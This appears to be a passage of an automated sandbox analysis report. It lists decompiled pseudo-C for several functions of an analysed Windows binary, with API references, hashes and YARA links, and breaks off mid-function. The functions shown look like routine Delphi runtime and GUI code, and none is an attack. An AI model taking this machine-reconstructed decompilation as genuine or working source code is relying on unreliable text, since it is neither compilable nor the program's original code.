Instruction Fuzzy Hash: D0414C35A001098FDB10DFADC588DAEB7F4EF18305F2045AAE984E7316DA35AE09CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0040A56C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040A56C(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40a727);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x491120; // 0x4075b0
					E00406548(_t52,  &_v8);
				} else {
					_t86 =  *0x4912a0; // 0x4075a8
					E00406548(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x4911f4; // 0x407550
					E00406548(_t60,  &_v372);
					E0040A194(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E004045B0( &_v340, 0x105,  &_v297);
					E00408AA4(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x491198; // 0x407600
					E00406548(_t82,  &_v344);
					E0040A194(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040A72E);
				E00404348( &_v372);
				E0040436C( &_v344, 3);
				return E00404348( &_v8);
			}

0x0040a56c
0x0040a579
0x0040a57f
0x0040a585
0x0040a58b
0x0040a591
0x0040a596
0x0040a597
0x0040a59c
0x0040a59f
0x0040a5a5
0x0040a5ac
0x0040a5c0
0x0040a5c5
0x0040a5ae
0x0040a5b1
0x0040a5b6
0x0040a5b6
0x0040a5ca
0x0040a5d7
0x0040a5e3
0x0040a69f
0x0040a6a5
0x0040a6af
0x0040a6b5
0x0040a6bc
0x0040a6c2
0x0040a6d8
0x0040a6dd
0x0040a6ef
0x0040a606
0x0040a609
0x0040a60f
0x0040a627
0x0040a638
0x0040a643
0x0040a649
0x0040a653
0x0040a659
0x0040a660
0x0040a666
0x0040a67c
0x0040a681
0x0040a693
0x0040a698
0x0040a6f8
0x0040a6fb
0x0040a6fe
0x0040a709
0x0040a719
0x0040a726

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040A727), ref: 0040A5D7
GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040A727), ref: 0040A5F9

Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579

Strings

Pu@, xrefs: 0040A6D8

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FileLoadModuleNameQueryStringVirtual
String ID: Pu@
API String ID: 902310565-3077127041
Opcode ID: 02156adca1f585b11c0c4578929e0c4ae99548c1f3482961343618982b328d77
Instruction ID: 240e037d2e4fdf7a2f2a9f7972edbd4e2c0b15f25f5dccbaf71f1a2df42bcb43
Opcode Fuzzy Hash: 02156adca1f585b11c0c4578929e0c4ae99548c1f3482961343618982b328d77
Instruction Fuzzy Hash: 8E410570900668DFDB61DF64CD81BDAB7F4AB49304F4040EAE908AB395D778AE84CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0044898C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0044898C(intOrPtr __eax, void* __edx) {
				char _v8;
				signed short _v10;
				intOrPtr _v16;
				char _v17;
				char _v24;
				intOrPtr _t34;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t69 = _t71;
				_t72 = _t71 + 0xffffffec;
				_t51 = __edx;
				_v16 = __eax;
				_v10 =  *((intOrPtr*)(__edx + 4));
				if(_v10 == 0) {
					return 0;
				} else {
					if(GetKeyState(0x10) < 0) {
						_v10 = _v10 + 0x2000;
					}
					if(GetKeyState(0x11) < 0) {
						_v10 = _v10 + 0x4000;
					}
					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
						_v10 = _v10 + 0x8000;
					}
					_v24 =  *((intOrPtr*)(_v16 + 0x34));
					_t34 =  *0x492bf8; // 0x2410880
					E0042687C(_t34,  &_v24);
					_push(_t69);
					_push(0x448a8a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					while(1) {
						_v17 = 0;
						_v8 = E00448690(_v16, 2, _v10 & 0x0000ffff);
						if(_v8 != 0) {
							break;
						}
						if(_v24 == 0 || _v17 != 2) {
							_pop(_t64);
							 *[fs:eax] = _t64;
							_push(0x448a91);
							_t40 =  *0x492bf8; // 0x2410880
							return E00426874(_t40);
						} else {
							continue;
						}
						goto L14;
					}
					_t42 =  *0x492bf8; // 0x2410880
					E0042687C(_t42,  &_v8);
					_push(_t69);
					_push(0x448a5f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					_v17 = E00448838( &_v8, 0, _t69);
					_pop(_t67);
					 *[fs:eax] = _t67;
					_push(0x448a66);
					_t48 =  *0x492bf8; // 0x2410880
					return E00426874(_t48);
				}
				L14:
			}

0x0044898d
0x0044898f
0x00448993
0x00448995
0x0044899f
0x004489a8
0x00448aa7
0x004489ae
0x004489b8
0x004489ba
0x004489ba
0x004489ca
0x004489cc
0x004489cc
0x004489d6
0x004489d8
0x004489d8
0x004489e4
0x004489ea
0x004489ef
0x004489f6
0x004489f7
0x004489fc
0x004489ff
0x00448a02
0x00448a02
0x00448a14
0x00448a1b
0x00000000
0x00000000
0x00448a6a
0x00448a74
0x00448a77
0x00448a7a
0x00448a7f
0x00448a89
0x00000000
0x00000000
0x00000000
0x00000000
0x00448a6a
0x00448a20
0x00448a25
0x00448a2c
0x00448a2d
0x00448a32
0x00448a35
0x00448a44
0x00448a49
0x00448a4c
0x00448a4f
0x00448a54
0x00448a5e
0x00448a5e
0x00000000

APIs

GetKeyState.USER32(00000010), ref: 004489B0
GetKeyState.USER32(00000011), ref: 004489C2

Strings

, xrefs: 004489D2

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: State
String ID:
API String ID: 1649606143-3916222277
Opcode ID: e34ac20bf1577ff9bf75a0614ffc8b50759ed40ebfae39e54516f6bf0673af27
Instruction ID: 30f9d3f5a50346b50cace2907c7ce9bbd4ad570ce9a17f6df8ef4bc3d9cf31fe
Opcode Fuzzy Hash: e34ac20bf1577ff9bf75a0614ffc8b50759ed40ebfae39e54516f6bf0673af27
Instruction Fuzzy Hash: B931D634A04308EFFB11EFA5D90169EB7F5EB44304F5584BBE800B7291EAB89A00C658

Uniqueness

Uniqueness Score: -1.00%

Function 00424D68, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00424D68(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t77;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;

				_t77 = _t78;
				_t79 = _t78 + 0xfffffff8;
				_v8 = __eax;
				_v12 = E004035AC(1);
				_push(_t77);
				_push(0x424def);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79;
				 *((intOrPtr*)(_v12 + 8)) = __edx;
				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
				_t80 = _t79 + 0xc;
				 *((char*)(_v12 + 0x70)) = _a8;
				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
				}
				_t62 =  *0x4122e0; // 0x41232c
				 *((intOrPtr*)(_v12 + 0x6c)) = E0040378C(_a4, _t62);
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0x492a44);
				L004068AC();
				_push(_t77);
				_push(0x424e4f);
				_push( *[fs:edx]);
				 *[fs:edx] = _t80;
				E004237FC( *((intOrPtr*)(_v8 + 0x28)));
				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
				E004237F8(_v12);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(E00424E56);
				_push(0x492a44);
				L004069F4();
				return 0;
			}

0x00424d69
0x00424d6b
0x00424d75
0x00424d84
0x00424d89
0x00424d8a
0x00424d8f
0x00424d92
0x00424d98
0x00424d9e
0x00424db1
0x00424db1
0x00424db9
0x00424dc3
0x00424dce
0x00424dce
0x00424dd4
0x00424de2
0x00424de7
0x00424dea
0x00424e06
0x00424e0b
0x00424e12
0x00424e13
0x00424e18
0x00424e1b
0x00424e24
0x00424e2f
0x00424e32
0x00424e39
0x00424e3c
0x00424e3f
0x00424e44
0x00424e49
0x00424e4e

APIs

RtlEnterCriticalSection.KERNEL32(00492A44,00000000,?,?), ref: 00424E0B
RtlLeaveCriticalSection.KERNEL32(00492A44,00424E56,00492A44,00000000,?,?), ref: 00424E49

Strings

,#A, xrefs: 00424DD4

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave
String ID: ,#A
API String ID: 3168844106-1902403825
Opcode ID: 2b5b3184f5fafa65cc736e12a1ecfee740cdb6b8bd0164809beca74f5554cf4f
Instruction ID: c82025d02218eb86c3043db56a4d0818c2728f90a6f848b2207ad54f2327b0ef
Opcode Fuzzy Hash: 2b5b3184f5fafa65cc736e12a1ecfee740cdb6b8bd0164809beca74f5554cf4f
Instruction Fuzzy Hash: D3218375B04304EFDB15DF69D881989BBF5FB88710B5181AAF804A7761C678EE40CA58

Uniqueness

Uniqueness Score: -1.00%

Function 00424344, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00424344(intOrPtr __eax, void* __edx, void* __edi) {
				intOrPtr _v8;
				char _v92;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t41;
				void* _t43;
				intOrPtr _t52;
				intOrPtr _t57;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t64;
				void* _t66;
				intOrPtr _t67;

				_t59 = __edi;
				_t64 = _t66;
				_t67 = _t66 + 0xffffffa8;
				_push(_t60);
				_t43 = __edx;
				_v8 = __eax;
				if(__edx == 0) {
					L2:
					_push(0x492a44);
					L004068AC();
					_push(_t64);
					_push(0x4243fc);
					_push( *[fs:eax]);
					 *[fs:eax] = _t67;
					if(_t43 == 0) {
						E00402EF0( &_v92, 0x54);
						E00424D68(_v8, _t43, 0, 0, _t59, _t60, 0, 0,  &_v92);
					} else {
						_t61 = _t43;
						E004237F8( *((intOrPtr*)(_t61 + 0x28)));
						E004237FC( *((intOrPtr*)(_v8 + 0x28)));
						 *((intOrPtr*)(_v8 + 0x28)) =  *((intOrPtr*)(_t61 + 0x28));
						 *((char*)(_v8 + 0x21)) =  *((intOrPtr*)(_t61 + 0x21));
						 *((intOrPtr*)(_v8 + 0x34)) =  *((intOrPtr*)(_t61 + 0x34));
						 *((char*)(_v8 + 0x38)) =  *((intOrPtr*)(_t61 + 0x38));
					}
					_pop(_t52);
					 *[fs:eax] = _t52;
					_push(E00424403);
					_push(0x492a44);
					L004069F4();
					return 0;
				} else {
					_t57 =  *0x41e494; // 0x41e4e0
					if(E00403768(__edx, _t57) == 0) {
						_t41 = E00414A88(_v8, _t43);
						return _t41;
					} else {
						goto L2;
					}
				}
			}

0x00424344
0x00424345
0x00424347
0x0042434b
0x0042434c
0x0042434e
0x00424353
0x0042436a
0x0042436a
0x0042436f
0x00424376
0x00424377
0x0042437c
0x0042437f
0x00424384
0x004243cb
0x004243df
0x00424386
0x00424386
0x0042438b
0x00424396
0x004243a1
0x004243aa
0x004243b3
0x004243bc
0x004243bc
0x004243e6
0x004243e9
0x004243ec
0x004243f1
0x004243f6
0x004243fb
0x00424355
0x00424357
0x00424364
0x00424428
0x00424432
0x00000000
0x00000000
0x00000000
0x00424364

APIs

RtlEnterCriticalSection.KERNEL32(00492A44), ref: 0042436F
RtlLeaveCriticalSection.KERNEL32(00492A44,00424403,00000000,004243FC,?,00492A44), ref: 004243F6

Part of subcall function 00424D68: RtlEnterCriticalSection.KERNEL32(00492A44,00000000,?,?), ref: 00424E0B
Part of subcall function 00424D68: RtlLeaveCriticalSection.KERNEL32(00492A44,00424E56,00492A44,00000000,?,?), ref: 00424E49

Strings

A, xrefs: 00424357

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave
String ID: A
API String ID: 3168844106-2078354741
Opcode ID: 2be02bd0951b54f05d6a4697f063ef31634a22b8b0d7236929331057d0209b4d
Instruction ID: e4c60fae559a079f8f962c10c3cb4d28f77953d953f980d94cfa5674b0fd86e4
Opcode Fuzzy Hash: 2be02bd0951b54f05d6a4697f063ef31634a22b8b0d7236929331057d0209b4d
Instruction Fuzzy Hash: 0F212C757042459FCB10DF99D98299EB7F5FF8C310BA041BAE80493752C674DE01DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0044874C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044874C(void* __eax, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				intOrPtr* _t27;
				intOrPtr _t29;
				void* _t39;
				intOrPtr _t42;
				intOrPtr _t45;
				int _t50;
				void* _t51;

				_t51 = __eax;
				_t39 = 0;
				_t50 = E00448690(__eax, 1, __edx);
				if(_t50 == 0) {
					if(( *(_t51 + 0x1c) & 0x00000010) == 0) {
						_t45 =  *0x4445d8; // 0x444624
						if(E00403768(_t51, _t45) != 0) {
							E00447764( *((intOrPtr*)(_t51 + 0x34)));
						}
					}
				} else {
					if(( *(_t50 + 0x1c) & 0x00000010) == 0) {
						E00447764(_t50);
					}
					 *((intOrPtr*)( *_t50 + 0x44))();
					_t24 = E00447DFC(_t50, _t39, 0, _t50, _t51);
					if((_t24 | E004482F8(_t50, 0)) != 0) {
						E004457D4(_t50, 0);
					}
					_t27 =  *0x49111c; // 0x492c04
					_t29 =  *((intOrPtr*)( *_t27 + 0x44));
					if(_t29 != 0) {
						_t42 = _t29;
						if( *((char*)(_t42 + 0x22f)) == 2 && _t50 ==  *((intOrPtr*)(_t42 + 0x258)) && SendMessageA( *(_t42 + 0x254), 0x234, 0, 0) != 0) {
							DrawMenuBar(E0043C1F4(_t42));
						}
					}
					_t39 = 1;
				}
				return _t39;
			}

0x0044874f
0x00448751
0x0044875c
0x00448760
0x004487f0
0x004487f4
0x00448801
0x00448806
0x00448806
0x00448801
0x00448766
0x0044876a
0x0044876e
0x0044876e
0x00448777
0x0044877e
0x00448792
0x00448796
0x00448796
0x0044879b
0x004487a2
0x004487a7
0x004487af
0x004487b8
0x004487e3
0x004487e3
0x004487b8
0x004487e8
0x004487e8
0x00448810

APIs

SendMessageA.USER32 ref: 004487D2
DrawMenuBar.USER32(00000000,?,00000234,00000000,00000000), ref: 004487E3

Strings

$FD, xrefs: 004487F4

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: DrawMenuMessageSend
String ID: $FD
API String ID: 2625368238-395794980
Opcode ID: d2d2ccfdfaaae11247bacaee34b8040d9b1ea4ac6513cfff3c17b8ffe6846643
Instruction ID: 09470d85930791357d69d9dfc81ff92af356171fadd1370cda87ce25fedad38f
Opcode Fuzzy Hash: d2d2ccfdfaaae11247bacaee34b8040d9b1ea4ac6513cfff3c17b8ffe6846643
Instruction Fuzzy Hash: 72116A347046405BFA10EA2A8C8576AA7965F95318F19407BF9009B396DE7CEC069B58

Uniqueness

Uniqueness Score: -1.00%

Function 00435F30, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00435F30(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t45;

				_v5 = 1;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t45 = E00414218( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t45 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t45 = _t45 - 1;
						_t40 = E004141BC(_t44, _t45);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E00435514(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t45 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}

0x00435f39
0x00435f46
0x00435f59
0x00435f5d
0x00435fad
0x00435fad
0x00435f5f
0x00435f5f
0x00435f5f
0x00435f69
0x00435f6f
0x00000000
0x00435f77
0x00435f7c
0x00435f90
0x00435fa7
0x00000000
0x00000000
0x00435fa7
0x00000000
0x00435fa9
0x00435fa9
0x00000000
0x00435f5f
0x00435fb1
0x00435fba

APIs

IntersectRect.USER32 ref: 00435F90
EqualRect.USER32 ref: 00435FA0

Strings

@, xrefs: 00435F71

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$EqualIntersect
String ID: @
API String ID: 3291753422-2766056989
Opcode ID: dbc5333581a1cf13dfe8a72e8ad6691df3d9856acb27b401823a38851404085f
Instruction ID: 01d255ee1b722bc3008dbe0edacece7f35c8b747239cce09de88e3b891fc9bf3
Opcode Fuzzy Hash: dbc5333581a1cf13dfe8a72e8ad6691df3d9856acb27b401823a38851404085f
Instruction Fuzzy Hash: 8911A331604648ABC701DA6CC884BDF7BE89F49328F0442A6FD04EB342D779DD4587D8

Uniqueness

Uniqueness Score: -1.00%

Function 0046DDD4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0046DDD4(char __edx, void* __edi, void* __esi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t12;
				signed int _t21;
				signed int _t22;
				signed int _t25;
				void* _t28;
				void* _t31;
				void* _t32;
				char _t33;
				signed int _t37;
				void* _t39;
				void* _t40;
				void* _t41;
				void* _t42;

				_t40 = __esi;
				_t39 = __edi;
				_t33 = __edx;
				if(__edx != 0) {
					_t42 = _t42 + 0xfffffff0;
					_t12 = E00403940(_t12, _t41);
				}
				_v5 = _t33;
				_t31 = _t12;
				E0043808C(_t31, _t32, 0, _t39, _t40);
				E00435330(_t31, GetSystemMetrics(2));
				E00435354(_t31, GetSystemMetrics(0x14));
				_t21 =  *(_t31 + 0x4c);
				_t37 = _t21;
				_t22 = _t21 >> 1;
				if(0 < 0) {
					asm("adc eax, 0x0");
				}
				E00435354(_t31, _t37 + _t22);
				 *((char*)(_t31 + 0x208)) = 1;
				 *((short*)(_t31 + 0x212)) = 0x64;
				 *((intOrPtr*)(_t31 + 0x214)) = 1;
				 *((char*)(_t31 + 0x228)) = 1;
				 *((char*)(_t31 + 0x229)) = 1;
				 *((char*)(_t31 + 0x21e)) = 1;
				_t25 =  *0x46de84; // 0x80
				 *(_t31 + 0x50) =  !_t25 &  *(_t31 + 0x50);
				_t28 = _t31;
				if(_v5 != 0) {
					E00403998(_t28);
					_pop( *[fs:0x0]);
				}
				return _t31;
			}

0x0046ddd4
0x0046ddd4
0x0046ddd4
0x0046dddb
0x0046dddd
0x0046dde0
0x0046dde0
0x0046dde5
0x0046dde8
0x0046ddee
0x0046ddfe
0x0046de0e
0x0046de13
0x0046de16
0x0046de18
0x0046de1a
0x0046de1c
0x0046de1c
0x0046de23
0x0046de28
0x0046de2f
0x0046de38
0x0046de42
0x0046de49
0x0046de50
0x0046de57
0x0046de61
0x0046de64
0x0046de6a
0x0046de6c
0x0046de71
0x0046de78
0x0046de80

APIs

GetSystemMetrics.USER32 ref: 0046DDF5
GetSystemMetrics.USER32 ref: 0046DE05

Strings

d, xrefs: 0046DE2F

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem
String ID: d
API String ID: 4116985748-2564639436
Opcode ID: a1809def662c50379d642b71605161b6dd6644318fa055b6925c5c9479d7b7fa
Instruction ID: 92cf4d2ad0ea0bdd6e0aca3f1e07709481ff7d6c600e189b7014b94f43e94bcc
Opcode Fuzzy Hash: a1809def662c50379d642b71605161b6dd6644318fa055b6925c5c9479d7b7fa
Instruction Fuzzy Hash: 5A117061B446448AD700EF7998863853A955B1530CF085579EC488F387EABE9848832A

Uniqueness

Uniqueness Score: -1.00%

Function 0044C628, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0044C628(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t12;
				intOrPtr _t16;
				intOrPtr _t23;
				char _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				void* _t30;
				void* _t31;
				intOrPtr _t32;

				_t30 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v8 = 0;
				_t23 =  *0x476b54; // 0x0
				_v12 = _t23;
				_t24 =  *0x476b60; // 0x0
				_v16 = _t24;
				 *0x476b54 = __eax;
				 *0x476b60 = 0;
				_push(_t30);
				_push(0x44c6cb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				_push(_t30);
				_push(0x44c694);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				_push(0);
				_push(E0044C5D8);
				_push(GetCurrentThreadId());
				L00406E2C();
				_t12 =  *0x476b60; // 0x0
				_v8 = _t12;
				_pop(_t25);
				 *[fs:eax] = _t25;
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(0x44c6d2);
				_t5 =  &_v16; // 0x42ef7e
				 *0x476b60 =  *_t5;
				_t16 = _v12;
				 *0x476b54 = _t16;
				return _t16;
			}

0x0044c629
0x0044c62b
0x0044c633
0x0044c636
0x0044c63c
0x0044c63f
0x0044c645
0x0044c648
0x0044c64f
0x0044c656
0x0044c657
0x0044c65c
0x0044c65f
0x0044c664
0x0044c665
0x0044c66a
0x0044c66d
0x0044c670
0x0044c672
0x0044c67c
0x0044c67d
0x0044c682
0x0044c687
0x0044c68c
0x0044c68f
0x0044c6af
0x0044c6b2
0x0044c6b5
0x0044c6ba
0x0044c6bd
0x0044c6c2
0x0044c6c5
0x0044c6ca

APIs

GetCurrentThreadId.KERNEL32 ref: 0044C677
72E7AC10.USER32(00000000,0044C5D8,00000000,00000000,0044C694,?,00000000,0044C6CB), ref: 0044C67D

Strings

~B, xrefs: 0044C6BA

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentThread
String ID: ~B
API String ID: 2882836952-157790649
Opcode ID: 73e4e1a1b6c12227e349ce7bbc583cb705b52ea44075890c7d2db7c9450a1e17
Instruction ID: 7c32539eb726ed1d4ae04739d1d36bde6d3191d9a6b0475311cdfb1f963f555f
Opcode Fuzzy Hash: 73e4e1a1b6c12227e349ce7bbc583cb705b52ea44075890c7d2db7c9450a1e17
Instruction Fuzzy Hash: 660196B4A05B04AFE301CF66DD61959BBFAF78A710723C476E808D3750E7386810CA1C

Uniqueness

Uniqueness Score: -1.00%

Function 00427304, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00427304(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x492ac6 != 0) {
					_t19 = 0;
